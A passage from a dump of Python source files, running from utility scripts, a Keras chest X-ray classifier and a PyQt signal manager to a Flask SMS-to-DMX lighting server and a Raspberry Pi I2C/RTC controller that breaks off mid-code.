KeyError('primitive %s is not in the list' % primitive)\n\n\ndef fix_bn(m):\n classname = m.__class__.__name__\n if classname.find('BatchNorm') != -1:\n m.half()\n\n\nif __name__ == '__main__':\n avg_meter = ExpMovingAvgrageMeter(momentum=0.9)\n for i in range(100):\n avg_meter.update(i)\n print(avg_meter.avg)\n","sub_path":"cifar_imagenet/utils_arun.py","file_name":"utils_arun.py","file_ext":"py","file_size_in_byte":12380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"490399548","text":"# Colm O Caoimh\n# Check if a number is prime.\n#The primes are 2, 3, 5, 7, 11, 13, ...\n\np = 347\nm = 2\nis_prime = True\n\nwhile m < p:\n if p % m == 0:\n is_prime = False\n m = m + 1\n\nif is_prime:\n print(p, \"is a prime 
number\")\nelse:\n print(p, \"is not prime.\")\n","sub_path":"prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"652797042","text":"# 模拟竞赛系统,按照名次打印\nfrom random import randint\nfrom time import time\nfrom collections import OrderedDict\nfrom pip._vendor.distlib.compat import raw_input\n\nd = OrderedDict()\nplayers = list('ABCDEFGH')\npos = len(players)-1\nstart = time()\n\nfor i in range(len(players)):\n raw_input()\n\n p = players.pop(randint(0, pos - i))\n end = time()\n d[p] = (i+1,end - start)\nfor k,v in d.items():\n print(k,v)\n\n\n","sub_path":"home-study/study-code/python-code/ten/seven.py","file_name":"seven.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"38097080","text":"import os\nimport tensorflow as tf\nfrom tensorflow.keras.applications.densenet import DenseNet121\nfrom tensorflow.keras.applications.inception_v3 import InceptionV3\nfrom tensorflow.keras.applications.xception import Xception\nfrom tensorflow.keras.applications.nasnet import NASNetMobile\nfrom tensorflow.keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom dpn import DPN137, DPN92, DPN98, DPN107\n\n\nclass XChest():\n def __init__(self, classes=1000, model_name=None, input_shape=(256, 256, 3)):\n self.model_name = model_name\n self.classes = classes\n self.input_shape = input_shape\n self.optimizer = tf.keras.optimizers.RMSprop()\n self.loss = 'binary_crossentropy'\n self.list_model = {\n 'densenet': DenseNet121,\n 'xception': Xception,\n 'inceptionv3': InceptionV3,\n 'nasnet': NASNetMobile,\n 'inception_resnet_v2': InceptionResNetV2,\n 'dpn': DPN137\n }\n\n def build(self):\n if self.model_name in self.list_model:\n base_model = self.list_model[self.model_name](include_top=False, weights='imagenet',\n input_shape=self.input_shape, )\n\n x = base_model.output\n\n x = tf.keras.layers.GlobalAveragePooling2D()(x)\n output = tf.keras.layers.Dense(units=self.classes, activation=\"sigmoid\")(x)\n\n model = tf.keras.Model(base_model.input, output)\n\n model.compile(optimizer=self.optimizer, loss=self.loss,\n metrics=['accuracy'])\n return model\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"20625408","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\nScript Name: UiSignals.py\nAuthor: Do Trinh/Jimmy - 3D artist.\n\nDescription:\n\n\"\"\"\n# -------------------------------------------------------------------------------------------------------------\nfrom __future__ import absolute_import, unicode_literals\n\"\"\" Import \"\"\"\n\n# Python\nimport os, json\n\n# PyQt5\nfrom PyQt5.QtCore import pyqtSignal\n\n# PLM\nfrom cores.Loggers import Loggers\nfrom appData import TMP_DIR\nfrom bin.data.damg import DAMG, DAMGLIST, DAMGDICT\n\n# -------------------------------------------------------------------------------------------------------------\n\"\"\" Signal class: setup all the signal which will be using. 
\"\"\"\n\nclass Signal(DAMG):\n\n key = 'Signal'\n\n _emittable = False\n\n # PLM class\n showLayout = pyqtSignal(str, str, name=\"showLayout\")\n executing = pyqtSignal(str, name=\"executing\")\n regisLayout = pyqtSignal(DAMG, name=\"regisLaout\")\n openBrowser = pyqtSignal(str, name=\"openBrowser\")\n setSetting = pyqtSignal(str, str, str, name=\"setSetting\")\n sysNotify = pyqtSignal(str, str, str, int, name=\"sysNotify\")\n loginChanged = pyqtSignal(bool, name='loginChanged')\n\n #\n updateAvatar = pyqtSignal(bool, name=\"updateAvatar\")\n\n # Settings class\n removeGrp = pyqtSignal(str, name='removeGroup')\n setFormat = pyqtSignal(str, name='setFormat')\n setScope = pyqtSignal(str, name='setScope')\n\n print_emittable = False\n print_emit = False\n print_block = False\n print_checkRepeat = False\n print_getSignal = False\n print_checkState = False\n auto_changeEmmittable = True\n\n _signals = DAMGDICT()\n _settings = DAMGDICT()\n\n states = DAMGDICT()\n\n def __init__(self, parent):\n super(Signal, self).__init__(parent)\n\n self.parent = parent\n self.logger = Loggers(self.parent.key)\n self.update()\n\n def update(self):\n return self.updateSignals(), self.updateSettings()\n\n def updateState(self):\n filePth = os.path.join(TMP_DIR, '.states')\n with open(filePth, 'w') as f:\n json.dump(self.states, f, indent=4)\n\n def loadState(self):\n filePth = os.path.join(TMP_DIR, '.states')\n if not os.path.exists(filePth):\n self.updateState()\n\n with open(filePth, 'r') as f:\n data = json.load(f)\n self.states.appendDict(data)\n\n def updateSignals(self):\n keys = ['showLayout', 'executing', 'regisLayout', 'openBrowser', 'setSetting', 'sysNotify', 'updateAvatar',\n 'loginChanged']\n signals = [self.showLayout, self.executing, self.regisLayout, self.openBrowser, self.setSetting, self.sysNotify,\n self.updateAvatar, self.loginChanged]\n olds = [self.showLayoutOld, self.executingOld, self.regisLayoutOld, self.openBrowserOld, self.setSettingOld,\n self.sysNotifyOld, self.updateAvatarOld, self.loginChangedOld]\n for i in range(len(keys)):\n key, signal, old = [keys[i], signals[i], olds[i]]\n self._signals.add(key, [signal, old])\n return self._signals\n\n def updateSettings(self):\n keys = ['emittable', 'emit', 'block', 'checkRepeat', 'getSignal', 'checkState']\n values = [self.print_emittable, self.print_emit, self.print_block, self.print_checkRepeat, self.print_getSignal,\n self.print_checkState]\n for i in range(len(keys)):\n self._settings.add(keys[i], values[i])\n return self._settings\n\n def changeSignalsSetting(self, key, value):\n self._settings[key] = value\n self._settings.update()\n return self._settings\n\n @property\n def signals(self):\n return self._signals\n\n @property\n def printCheckState(self):\n return self.print_checkState\n\n @property\n def autoChangeEmittable(self):\n return self.auto_changeEmmittable\n\n @property\n def printGetSignal(self):\n return self.print_getSignal\n\n @property\n def emitable(self):\n return self._emittable\n\n @property\n def printEmitable(self):\n return self.print_emittable\n\n @property\n def printEmit(self):\n return self.print_emit\n\n @property\n def printBlock(self):\n return self.print_block\n\n @property\n def printCheckRepeat(self):\n return self.print_checkRepeat\n\n @signals.setter\n def signals(self, val):\n self._signals = val\n\n @printCheckState.setter\n def printCheckState(self, val):\n self.print_checkState = val\n\n @autoChangeEmittable.setter\n def autoChangeEmittable(self, val):\n self.auto_changeEmmittable = val\n\n 
@printGetSignal.setter\n def printGetSignal(self, val):\n self.print_getSignal = val\n\n @printEmitable.setter\n def printEmitable(self, val):\n self.print_emittable = val\n\n @printEmit.setter\n def printEmit(self, val):\n self.print_emit = val\n\n @printBlock.setter\n def printBlock(self, val):\n self.print_block = val\n\n @printCheckRepeat.setter\n def printCheckRepeat(self, val):\n self.print_checkRepeat = val\n\n @emitable.setter\n def emitable(self, val):\n self._emittable = val\n\n# -------------------------------------------------------------------------------------------------------------\n\"\"\" Signal class: setup all the signal which will be using. \"\"\"\n\nclass SignalManager(Signal):\n\n key = \"SignalManager\"\n\n showLayoutOld = DAMGLIST()\n executingOld = DAMGLIST()\n regisLayoutOld = DAMGLIST()\n openBrowserOld = DAMGLIST()\n setSettingOld = DAMGLIST()\n sysNotifyOld = DAMGLIST()\n updateAvatarOld = DAMGLIST()\n loginChangedOld = DAMGLIST()\n\n def __init__(self, parent=None):\n super(SignalManager, self).__init__(parent)\n\n self.parent = parent\n\n try:\n self.parent.children()\n except AttributeError:\n pass\n else:\n self.setParent(self.parent)\n finally:\n self.key = '{0}_{1}'.format(self.parent.key, self.key)\n\n def emit(self, signal, op1=None, op2=None, op3=None, op4=None):\n\n if self._emittable:\n sig = self.getSignal(signal)\n self.loadState()\n if signal == 'showLayout':\n self.showLayoutOld, repeat = self.checkSignalRepeat(self.showLayoutOld, [op1, op2])\n old = self.showLayoutOld\n if repeat:\n if self.print_checkState:\n print(self.key, self.states)\n if not self.states[op1] == op2:\n self.states.add(op1, op2)\n self.updateState()\n sig.emit(op1, op2)\n else:\n if self.print_checkState:\n print(self.key, self.states)\n self.states.add(op1, op2)\n self.updateState()\n sig.emit(op1, op2)\n elif signal == 'executing':\n self.executingOld, repeat = self.checkSignalRepeat(self.executingOld, [op1])\n old = self.executingOld\n if not repeat:\n sig.emit(op1)\n elif signal == 'regisLayout':\n self.regisLayoutOld, repeat = self.checkSignalRepeat(self.regisLayoutOld, [op1])\n old = self.regisLayoutOld\n if not repeat:\n sig.emit(op1)\n elif signal == 'openBrowser':\n self.openBrowserOld, repeat = self.checkSignalRepeat(self.openBrowserOld, [op1])\n old = self.openBrowserOld\n if not repeat:\n sig.emit(op1)\n elif signal == 'setSetting':\n self.setSettingOld, repeat = self.checkSignalRepeat(self.setSettingOld, [op1, op2, op3])\n old = self.setSettingOld\n if not repeat:\n sig.emit(op1, op2, op3)\n elif signal == 'sysNotify':\n self.sysNotifyOld, repeat = self.checkSignalRepeat(self.sysNotifyOld, [op1, op2, op3, op4])\n old = self.sysNotifyOld\n if not repeat:\n sig.emit(op1, op2, op3, op4)\n elif signal == 'updateAvatar':\n self.updateAvatarOld, repeat = self.checkSignalRepeat(self.updateAvatarOld, [op1])\n old = self.updateAvatarOld\n if not repeat:\n sig.emit(op1)\n elif signal == 'loginChanged':\n self.loginChangedOld, repeat = self.checkSignalRepeat(self.loginChangedOld, [op1])\n old = self.loginChangedOld\n if not repeat:\n sig.emit(op1)\n else:\n repeat = False\n old = []\n\n if repeat:\n if self.print_block:\n print('{2}: block signal {0}: {1}'.format(signal, old, self.key))\n return\n else:\n if self.print_emit:\n print('{0} signal {1} emmited'.format(self.parent.key, signal))\n return\n else:\n if self.print_emittable:\n print('UnEmittableError: {0} is not allowed to emit'.format(self.key))\n return\n\n def getSignal(self, signal):\n if 
self.print_getSignal:\n print('{0} get signal: {1}'.format(self.parent.key, signal))\n return self.signals[signal][0]\n\n def connect(self, signal, target):\n sig = self.getSignal(signal)\n if self.auto_changeEmmittable:\n self._emittable = True\n return sig.connect(target)\n else:\n print('EmittableAllowError: Signal is not allowed to emit: {0}'.format(signal))\n\n def checkSignalRepeat(self, old, data):\n new = [i for i in data]\n\n if self.print_checkRepeat:\n print(new, old)\n\n if len(new) == 0:\n repeat = False\n elif len(new) == len(old):\n repeat = True\n for i in range(len(new)):\n if not new[i] == old[i]:\n repeat = False\n break\n else:\n repeat = False\n\n old = DAMGLIST()\n old.appendList(new)\n return old, repeat\n\n# -------------------------------------------------------------------------------------------------------------\n# Created by panda on 25/10/2019 - 6:59 AM\n# © 2017 - 2018 DAMGteam. All rights reserved","sub_path":"ui/SignalManager.py","file_name":"SignalManager.py","file_ext":"py","file_size_in_byte":11331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"190134130","text":"from __future__ import print_function\nfrom flask import Flask, render_template, request\nfrom uwsgidecorators import *\nfrom xkcd_colors import xkcd_names_to_hex\nimport webcolors\nimport time\nfrom random import randint\n\nimport socket\nfrom ola.ClientWrapper import ClientWrapper\nimport array\nimport sys\n\nwrapper = None\n\npublic = Flask(__name__)\npublic.config['PROPAGATE_EXCEPTIONS'] = True\n\n# Include \"no-cache\" header in all POST responses\n@public.after_request\ndef add_no_cache(response):\n if request.method == 'POST':\n response.cache_control.no_cache = True\n return response\n\n### Home page ###\n@public.route('/')\n@public.route('/index.html')\ndef default_page():\n return render_template('/index.html')\n\ndef DmxSent(status):\n if status.Succeeded():\n print('Success!')\n else:\n print('Error: %s' % status.message, file=sys.stderr)\n\n global wrapper\n if wrapper:\n wrapper.Stop()\n\n@public.route('/sms', methods=['POST'])\ndef parse_sms():\n message = str(request.form['Body']).strip().lower()\n print(\"Received text message: \" + message)\n universe = 1\n num_fixtures = 24\n data = array.array('B')\n if(message == \"secret\"):\n data.append(0)\n data.append(0)\n data.append(255)\n data.append(255)\n data.append(0)\n data.append(0)\n data = data * (num_fixtures/2)\n else:\n try:\n color = webcolors.hex_to_rgb(xkcd_names_to_hex[message])\n except:\n color = [randint(0, 255), randint(0, 255), randint(0, 255)]\n data.append(color[0])\n data.append(color[1])\n data.append(color[2])\n data = data * num_fixtures\n\n ip = \"172.16.11.50\"\n port = 5000\n message = \"listentome\"\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.sendto(message.encode(), (ip, port))\n\n time.sleep(0.1)\n global wrapper\n wrapper = ClientWrapper()\n client = wrapper.Client()\n client.SendDmx(universe, data, DmxSent)\n wrapper.Run()\n return ('')\n\n# @public.route('/sms', methods=['POST'])\n# def control_lights():\n# d = {'airforceblue': '11',\n# 'airsuperiorityblue': '11',\n# 'aliceblue': '16',\n# 'youcompletemelights': '92',\n# 'zebra': '93'}\n# allowed_commands = ['X040A',\n# 'X040B',\n# 'X0462']\n# import random\n# message = request.form['Body']\n# print \"Received text message: \" + str(message)\n# try:\n# program = int(d[message[0:25].lower().replace(' ', '')])\n# except KeyError:\n# print 'color {0} not 
found'.format(message)\n# program = random.randint(10,98)\n# command = 'X04%(number)2.2X' % {"number": program}\n# print 'Translated {0} to {1}'.format(message, command)\n# if (command in allowed_commands):\n# pytronics.serialWrite(command, speed=9600)\n# else:\n# print "Command {0} is not one of the allowed commands.".format(command)\n# command = 'FAIL'\n# return('{0}'.format(command))\n\nif __name__ == "__main__":\n public.run(host='127.0.0.1', port=5000, debug=True)\n","sub_path":"Software and Code/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"646888179","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n@author: yushuibo\n@licence: (c) Copyright 2017-2027, Node Supply China Manager Corporation Limited.\n@contact: hengchen2005@gmail.com\n@software: PyCharm\n@site : \n@file : disk_monitor.py\n@time: 2018/2/7 01:39 PM\n@desc: --\n'''\n\nfrom utils.monitor import Monitor\n\n\nclass DiskMonitor(Monitor):\n\n\tdef watch(self, server):\n\t\tfor disk in server.disks:\n\t\t\tif disk.is_less():\n\t\t\t\tmsg = 'A problem of low hard drive space.\\nDetails:\\n\\tServerName:\\t{0}\\n\\tIP:\\t{1}\\n\\tDisk:\\n\\t' \\\n\t\t\t\t 'FileSystem\\tSize\\tUsed\\tAvail\\tUsed%\\tMounted on\\n\\t{2}\\t{3}\\t{4}\\t{5}\\t{6}\\t{7}'.\\\n\t\t\t\t\tformat(server.name, server.ip, disk.fileSystem, disk.size, disk.used, disk.avail, disk.use_percent,\n\t\t\t\t disk.mounted_on)\n\t\t\t\tself.send_mail('Warning!', msg)\n","sub_path":"lazydog/build/lazydog_v0.1/utils/disk_monitor.py","file_name":"disk_monitor.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"284223929","text":"from django.shortcuts import render\n\n## app specific\n# from .models import Tile\n# from apps.portal.models import Banner\n\n## set some variables for the scope of this application's views\nappName = 'landing'\nappTitle = 'Home'\n\n\ndef index( request ):\n template = appName+'/index.html'\n data = {\n 'appTitle': appTitle,\n 'appUrlBase': '/'+appName+'/',\n 'pageHeader': appTitle,\n }\n\n return render( request, template, data )\n","sub_path":"project/apps/landing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"279850997","text":"class Solution:\n # @return an integer\n def threeSumClosest(self, num, target):\n\n num.sort()\n #print num\n length = len(num)\n minDist = None\n minSum = None\n\n for i in range(length-2):\n\n if i > 0 and num[i-1] == num[i]:\n continue\n\n\n target2 = target - num[i]\n\n sum = self.twoSumClosest(num, length, i+1, target2)\n #print target2, sum\n dist = target2 - sum\n if minDist == None or abs(dist) < abs(minDist):\n minDist = dist\n minSum = num[i] + sum\n #print 'ssss', i, num[i], sum, minSum\n\n return minSum\n\n def twoSumClosest(self, num, length, start, target):\n\n minDist = None\n minSum = None\n\n end = length - 1\n\n #print start, target\n\n while start < end:\n\n sum = num[start] + num[end]\n\n dist = sum - target\n if minDist == None or abs(dist) < abs(minDist):\n minDist = dist\n minSum = sum\n #print 'minSum', start, end, sum, target\n\n\n if sum > target:\n end -= 1\n elif sum < target:\n start += 1\n else:\n\n return sum\n\n\n return
minSum\n\n\n","sub_path":"LeetCode/python/001-030/016-3sum-closest/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"117361524","text":"#!/usr/bin/python\n# encoding=utf-8\nimport smbus\nimport time\nimport sys\nimport datetime\nfrom datetime import datetime\nimport socket\nimport _thread\nimport configparser\nimport os\nimport RPi.GPIO as GPIO\n\n#Status Variable 16IN 1x pro Bus mit 8 Werten\nstatIN0 = [0,0,0,0,0,0,0,0]\nstatIN1 = [0,0,0,0,0,0,0,0]\nstatIN2 = [0,0,0,0,0,0,0,0]\n\n#Globale Variablen\nstatusI2C = 1\nclSocket = \"\"\nclIP = \"\"\naIN0 = []\naIN1 = []\naIN2 = []\naOut0= []\naOut1= []\naOut2= []\naPWM0= []\naPWM1= []\naPWM2= []\naRGBW0= []\naRGBW1= []\naRGBW2= []\naANA0= []\naANA1= []\naANA2= []\n\n#MUX:\nclass multiplex:\n \n def __init__(self, bus):\n self.bus = smbus.SMBus(bus)\n\n def channel(self, address=0x71,channel=0): # values 0-3 indictae the channel, anything else (eg -1) turns off all channels\n \n if (channel==0): action = 0x04\n elif (channel==1): action = 0x05\n elif (channel==2): action = 0x06\n elif (channel==3): action = 0x07\n else : action = 0x00\n self.bus.write_byte_data(address,0x04,action) #0x04 is the register for switching channels \n\n\n#RTC:\ndef _bcd_to_int(x):\n # Decode 2x4 bit BCD to byte value\n return int((x//16)*10 + x%16)\n\ndef _int_to_bcd(x):\n # Encode byte value to BCD\n return int((x//10)*16 + x%10)\n\n#http://www.netzmafia.de/skripten/hardware/RasPi/Projekt-RTC/DS1307_lib.py\nclass DS1307():\n DS_REG_SECONDS = 0x00\n DS_REG_MINUTES = 0x01\n DS_REG_HOURS = 0x02\n DS_REG_DOW = 0x03\n DS_REG_DAY = 0x04\n DS_REG_MONTH = 0x05\n DS_REG_YEAR = 0x06\n DS_REG_CONTROL = 0x07\n DS_REG_TEMP_HSB = 0x11\n DS_REG_TEMP_LSB = 0x12\n \n\n def __init__(self, twi=1, addr=0x68):\n self._bus = smbus.SMBus(twi)\n self._addr = addr\n\n def _read_seconds(self):\n return _bcd_to_int(self._bus.read_byte_data(self._addr, self.DS_REG_SECONDS))\n \n def _read_minutes(self):\n return _bcd_to_int(self._bus.read_byte_data(self._addr, self.DS_REG_MINUTES))\n\n def _read_hours(self):\n d = self._bus.read_byte_data(self._addr, self.DS_REG_HOURS)\n if (d == 0x64): # 12-Std.-Modus\n if ((d & 0b00100000) > 0):\n # Umrechnen auf 24-Std.-Modus\n return _bcd_to_int(d & 0x3F) + 12\n return _bcd_to_int(d & 0x3F)\n\n def _read_dow(self):\n return _bcd_to_int(self._bus.read_byte_data(self._addr, self.DS_REG_DOW))\n\n def _read_day(self):\n return _bcd_to_int(self._bus.read_byte_data(self._addr, self.DS_REG_DAY))\n\n def _read_month(self):\n return _bcd_to_int(self._bus.read_byte_data(self._addr, self.DS_REG_MONTH)&0b01111111)\n\n def _read_year(self):\n return _bcd_to_int(self._bus.read_byte_data(self._addr, self.DS_REG_YEAR))\n\n def read_temp(self):\n byte_tmsb = self._bus.read_byte_data(self._addr,self.DS_REG_TEMP_HSB)\n byte_tlsb = bin(self._bus.read_byte_data(self._addr,self.DS_REG_TEMP_LSB))[2:].zfill(8)\n return byte_tmsb+int(byte_tlsb[0])*2**(-1)+int(byte_tlsb[1])*2**(-2)\n\n def read_all(self):\n # Gibt eine Liste zurueck: (year, month, day, dow, hours, minutes, seconds).\n return (self._read_year(), self._read_month(), self._read_day(),\n self._read_dow(), self._read_hours(), self._read_minutes(),\n self._read_seconds())\n\n def read_str(self, century=20):\n # Gibt einen Datum/Zeit-String im Format 'YYYY-DD-MM HH:MM:SS' zurueck.\n return '%04d-%02d-%02d %02d:%02d:%02d' % (century*100 + self._read_year(),\n self._read_month(), 
self._read_day(), self._read_hours(),\n self._read_minutes(), self._read_seconds())\n\n def read_datetime(self, century=20, tzinfo=None):\n # Gibt ein datetime.datetime Objekt zurueck.\n return datetime(century*100 + self._read_year(),\n self._read_month(), self._read_day(), self._read_hours(),\n self._read_minutes(), self._read_seconds(), 0, tzinfo=tzinfo)\n\n def set_clock(self, century=20):\n # Liest einen Datum/Zeit-String im Format 'MMDDhhmmYYss' aus der RTC \n # und setzt das Systemdatum mittels date-Kommando.\n cmd = 'sudo date %02d%02d%02d%02d%04d.%02d' % (self._read_month(),\n self._read_day(), self._read_hours(), self._read_minutes(),\n century*100 + self._read_year(), self._read_seconds())\n os.system(cmd)\n\n\n def write_all(self, seconds=None, minutes=None, hours=None, dow=None,\n day=None, month=None, year=None):\n # Setzt Datum und Uhrzeit der RTC, jedoch nur die nicht-None-Werte.\n # Prueft auf Einhaltung der zulaessigen Wertegrenzen:\n # seconds [0-59], minutes [0-59], hours [0-23],\n # dow [1-7], day [1-31], month [1-12], year [0-99].\n if seconds is not None:\n if seconds < 0 or seconds > 59:\n raise ValueError('Seconds out of range [0-59].')\n self._bus.write_byte_data(self._addr, self.DS_REG_SECONDS, _int_to_bcd(seconds))\n\n if minutes is not None:\n if minutes < 0 or minutes > 59:\n raise ValueError('Minutes out of range [0-59].')\n self._bus.write_byte_data(self._addr, self.DS_REG_MINUTES, _int_to_bcd(minutes))\n\n if hours is not None:\n if hours < 0 or hours > 23:\n raise ValueError('Hours out of range [0-23].')\n self._bus.write_byte_data(self._addr, self.DS_REG_HOURS, _int_to_bcd(hours))\n\n if year is not None:\n if year < 0 or year > 99:\n raise ValueError('Year out of range [0-99].')\n self._bus.write_byte_data(self._addr, self.DS_REG_YEAR, _int_to_bcd(year))\n\n if month is not None:\n if month < 1 or month > 12:\n raise ValueError('Month out of range [1-12].')\n self._bus.write_byte_data(self._addr, self.DS_REG_MONTH, _int_to_bcd(month))\n\n if day is not None:\n if day < 1 or day > 31:\n raise ValueError('Day out of range [1-31].')\n self._bus.write_byte_data(self._addr, self.DS_REG_DAY, _int_to_bcd(day))\n\n if dow is not None:\n if dow < 1 or dow > 7:\n raise ValueError('DOW out of range [1-7].')\n self._bus.write_byte_data(self._addr, self.DS_REG_DOW, _int_to_bcd(dow))\n\n def write_datetime(self, dto):\n # Setzt Datum/Zeit der RTC aus dem Inhalt eines datetime.datetime-Objekts.\n # isoweekday() liefert: Montag = 1, Dienstag = 2, ..., Sonntag = 7;\n # RTC braucht: Sonntag = 1, Montag = 2, ..., Samstag = 7\n wd = dto.isoweekday() + 1 # 1..7 -> 2..8\n if wd == 8: # Sonntag\n wd = 1\n self.write_all(dto.second, dto.minute, dto.hour, wd,\n dto.day, dto.month, dto.year % 100)\n\n def write_now(self):\n # Aequivalent zu write_datetime(datetime.datetime.now()).\n self.write_datetime(datetime.now())\n\n\n#Konfiguration schreiben, wenn nicht vorhanden, anlegen, sonst gewünschte Daten hinzufügen/Anpassen\ndef configSchreiben(bereich,wert1, wert2):\n config = configparser.ConfigParser()\n config.read('Config.cfg')\n if config.has_section('Allgemein') != True:\n config['Allgemein'] = {'IP':'127.0.0.1','Port':'8000',\n 'StartZeit':str(datetime.now())}\n \n if bereich=='Allgemein': \n if config.has_option('Allgemein','StartZeit'):\n config.set('Allgemein','StartZeit',str(datetime.now()))\n else: \n config['Allgemein'] = {'StartZeit':str(datetime.now())}\n else:\n if config.has_section(bereich):\n if config.has_option(bereich,wert1):\n 
config.set(bereich,wert1,wert2)\n else:\n config[bereich][wert1] = wert2\n else:\n config.add_section(bereich)\n if config.has_option(bereich,wert1):\n config.set(bereich,wert1,wert2)\n else:\n config[bereich][wert1] = wert2 \n with open('Config.cfg','w') as configfile:\n config.write(configfile)\n configfile.close\n\ndef _check_i2c():\n global statusI2C\n iCnt=0\n while True:\n if statusI2C==1:\n return True\n else:\n iCnt+=1\n if iCnt >= 50:\n log(\"I2C Status: {0}\".format(str(statusI2C)),\"ERROR\")\n if iCnt>= 2000:\n return False\n time.sleep(0.001)\n return False\n\ndef set_output_konfig(kanal,adresse):\n global statusI2C\n if adresse <0x24 or adresse > 0x27:\n log(\"Modul adresse ungueltig\",\"ERROR\")\n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\",\"ERROR\")\n return\n if _check_i2c() == False:\n return\n statusI2C=0\n #Konfiguration als Ausgangsmodul:\n try: \n plexer.channel(mux,kanal) \n plexer.bus.write_byte_data(adresse,bankAKonfig,outputKonfig)\n plexer.bus.write_byte_data(adresse,bankBKonfig,outputKonfig) \n log(\"Adresse: \" +str(hex(adresse)) + \" - Port A + B als Output gesetzt\")\n except:\n statusI2C=1\n log(\"Fehler beim Output konfigurieren\",\"ERROR\")\n statusI2C=1\n\ndef set_pwm_konfig(kanal, adresse):\n global statusI2C\n if adresse <0x50 or adresse > 0x5f:\n log(\"Modul adresse ungueltig: {0}\".format(adresse),\"ERROR\")\n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\",\"ERROR\")\n return\n if _check_i2c() == False:\n return\n statusI2C=0\n try:\n plexer.channel(mux,kanal)\n log(\"Adresse: {0} - PWM Konfig gesetzt\".format(hex(adresse)))\n \n #Mode1 = sleep Register 0 Wert = 16\n plexer.bus.write_byte_data(adresse,0x00,0x10)\n #prescale: round((25.000.000/(4096*Freuqnz))-1) Frequenz aus Konfig lesen!\n prescale=round((25000000/(4096*freqStd))-1)\n plexer.bus.write_byte_data(adresse,0xFE,prescale)\n #mode1 = sleep Register 0 Wert=32\n plexer.bus.write_byte_data(adresse,0x00,0x20)\n #mode2 = Ausgang Register 1 Wert = 4\n plexer.bus.write_byte_data(adresse,0x01,0x04) \n statusI2C=1\n except:\n statusI2C=1\n log(\"Fehler beim PWM konfigurieren\",\"ERROR\")\n \ndef set_input_konfig(kanal,adresse):\n global statusI2C\n if adresse <0x20 or adresse > 0x23:\n log(\"Modul adresse ungueltig\",\"ERROR\")\n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\",\"ERROR\")\n return\n if _check_i2c() == False:\n return\n statusI2C=0\n #Konfiguration als Ausgangsmodul:\n try:\n plexer.channel(mux,kanal)\n plexer.bus.write_byte_data(adresse,bankAKonfig,inputKonfig)\n plexer.bus.write_byte_data(adresse,bankBKonfig,inputKonfig)\n plexer.bus.write_byte_data(adresse,IOCONA,0x44)\n plexer.bus.write_byte_data(adresse,IOCONB,0x44)\n plexer.bus.write_byte_data(adresse,DEFVALA,0x00)\n plexer.bus.write_byte_data(adresse,DEFVALB,0x00)\n plexer.bus.write_byte_data(adresse,INTCONA,0x00)\n plexer.bus.write_byte_data(adresse,INTCONB,0x00)\n plexer.bus.write_byte_data(adresse,GPPUA,0x00)\n plexer.bus.write_byte_data(adresse,GPPUB,0x00)\n plexer.bus.write_byte_data(adresse,IPOLA,0x00)\n plexer.bus.write_byte_data(adresse,IPOLB,0x00)\n plexer.bus.write_byte_data(adresse,GPINTENA,0xFF)\n plexer.bus.write_byte_data(adresse,GPINTENB,0xFF)\n log(\"Adresse:{0} - Port A + B als Input gesetzt\".format(hex(adresse)),\"INFO\")\n statusI2C=1\n except:\n log(\"Fehler beim Input konfigurieren\",\"ERROR\")\n statusI2C=1\n finally:\n statusI2C=1\n\ndef sendUDP(data):\n #Daten Senden\n global clSocket\n global clIP\n try:\n res=clSocket.send(data.encode())\n except 
IOError as err:\n log(\"UDP-Fehler:{0} ; {1}\".format(str(err),data),\"ERROR\")\n #Daten pruefen:\n if (int(res)==int(data.encode().__len__())):\n log(\"UDP-Gesendet: {0} : {1}\".format(clIP,data))\n else:\n log(\"UDP-Fehler. Gesendet: {0} Empfangen: {1}\".format(data.__len__(),res),\"ERROR\")\n log(\"UDP-Fehlerdaten: {0}\".format(data),\"ERROR\")\n\ndef getUDP():\n global statusI2C\n global clSocket\n global clIP\n conClosed=False\n (clSocket, clIP) = tcpSocket.accept()\n log(\"Verbunden: {0}\".format(clIP))\n while True:\n #log(\"Get UDP\")\n GeCoSInData=\"\"\n data=\"\"\n arr=\"\"\n while data[-1:]!=\"}\":\n try:\n #Testen ob noch verbunden? \n blk=clSocket.recv(1).decode(\"utf-8\")\n if len(blk)==0:\n conClosed=True\n break \n except:\n log(\"Fehler beim Empfangen\",\"ERROR\")\n #on a receive error treat the connection as closed, otherwise blk may be undefined below\n conClosed=True\n break\n data+=blk\n log(\"Empfangen: {0} : {1}\".format(clIP,data))\n GeCoSInData=data[:-1]\n data = \"\"\n if len(GeCoSInData)>0:\n if GeCoSInData[0]==\"{\":\n GeCoSInData=GeCoSInData.replace(\"{\",\"\")\n #GeCoSInData=GeCoSInData.replace(\"}\",\"\")\n #print(GeCoSInData)\n if GeCoSInData==\"MOD\":\n modulSuche()\n elif GeCoSInData==\"SAI\":\n interrutpKanal(intKanal0)\n interrutpKanal(intKanal1)\n interrutpKanal(intKanal2)\n 